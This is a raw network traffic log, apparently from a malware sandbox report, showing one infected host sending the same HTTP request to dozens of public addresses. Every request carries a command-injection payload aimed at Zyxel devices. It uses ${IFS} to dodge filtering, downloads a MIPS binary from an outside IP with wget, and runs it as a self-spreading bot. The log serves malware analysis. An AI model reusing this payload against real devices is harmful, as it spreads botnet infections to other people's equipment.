                                        Jan 14, 2024 16:18:00.939944983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        85192.168.2.1341230140.212.88.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.939981937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        86192.168.2.1350718118.227.192.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940038919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        87192.168.2.1356578148.80.6.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940114021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        88192.168.2.1356726220.129.115.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940118074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        89192.168.2.133443848.112.236.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940170050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        90192.168.2.1345628106.78.202.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940185070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        91192.168.2.134584490.162.249.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940252066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        92192.168.2.134220888.66.67.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940296888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        93192.168.2.1346112156.217.196.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940320969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        94192.168.2.1335286132.151.73.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940381050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        95192.168.2.1357972160.208.144.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940426111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        96192.168.2.1344004116.16.33.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940471888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        97192.168.2.1352562164.69.189.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940524101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        98192.168.2.134973487.118.212.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940582037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        99192.168.2.134235046.115.94.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940628052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        100192.168.2.1356126112.82.93.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940664053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        101192.168.2.1333176119.27.79.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940706015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        102192.168.2.1339076162.60.126.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940768003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        103192.168.2.1350842183.71.84.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940821886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        104192.168.2.134556249.183.17.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940860033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        105192.168.2.1337162102.145.24.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940891027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        106192.168.2.134391053.224.63.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.940965891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        107192.168.2.1352646158.226.231.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941013098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        108192.168.2.1353906119.44.205.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941036940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        109192.168.2.1341642179.110.22.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941119909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        110192.168.2.13596349.251.139.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941162109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        111192.168.2.1347678184.193.53.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941183090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        112192.168.2.13552621.196.211.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941251040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        113192.168.2.134868040.139.19.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941309929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        114192.168.2.1341730172.227.239.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941337109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        115192.168.2.135212282.234.91.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941386938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        116192.168.2.1345148108.161.199.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941454887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        117192.168.2.1335058177.178.235.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941521883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        118192.168.2.134078081.162.46.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941567898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        119192.168.2.1338594168.245.144.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941605091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        120192.168.2.1354422153.11.225.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941684961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        121192.168.2.1350222104.117.174.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941709995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        122192.168.2.1343062147.93.193.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941757917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        123192.168.2.135734099.155.85.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941772938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        124192.168.2.134235427.93.78.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941802025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        125192.168.2.1352410219.163.14.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941870928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        126192.168.2.13472945.52.96.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941907883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        127192.168.2.133712685.52.103.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941926003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        128192.168.2.135246634.195.183.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.941953897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        129192.168.2.134306667.255.131.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942030907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        130192.168.2.1351222136.185.174.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942071915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        131192.168.2.1355770190.209.154.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942115068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        132192.168.2.134400659.125.162.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942141056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        133192.168.2.1358048220.114.81.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942229986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        134192.168.2.1346586184.101.190.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942281961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        135192.168.2.135149817.191.161.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942286015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        136192.168.2.1353914106.222.145.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942312956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        137192.168.2.1340188114.84.243.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942372084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        138192.168.2.1357246106.228.89.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942424059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        139192.168.2.1344774220.179.21.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942467928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        140192.168.2.135257487.201.11.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942492962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        141192.168.2.1351660197.184.119.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942523003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        142192.168.2.1342644152.20.74.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942575932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        143192.168.2.135311489.191.174.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942608118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        144192.168.2.1335054130.139.108.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942642927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        145192.168.2.135066453.219.255.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942693949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        146192.168.2.133996612.57.176.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:00.942719936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        147192.168.2.1360254203.232.189.108443
                                        TimestampBytes transferredDirectionData
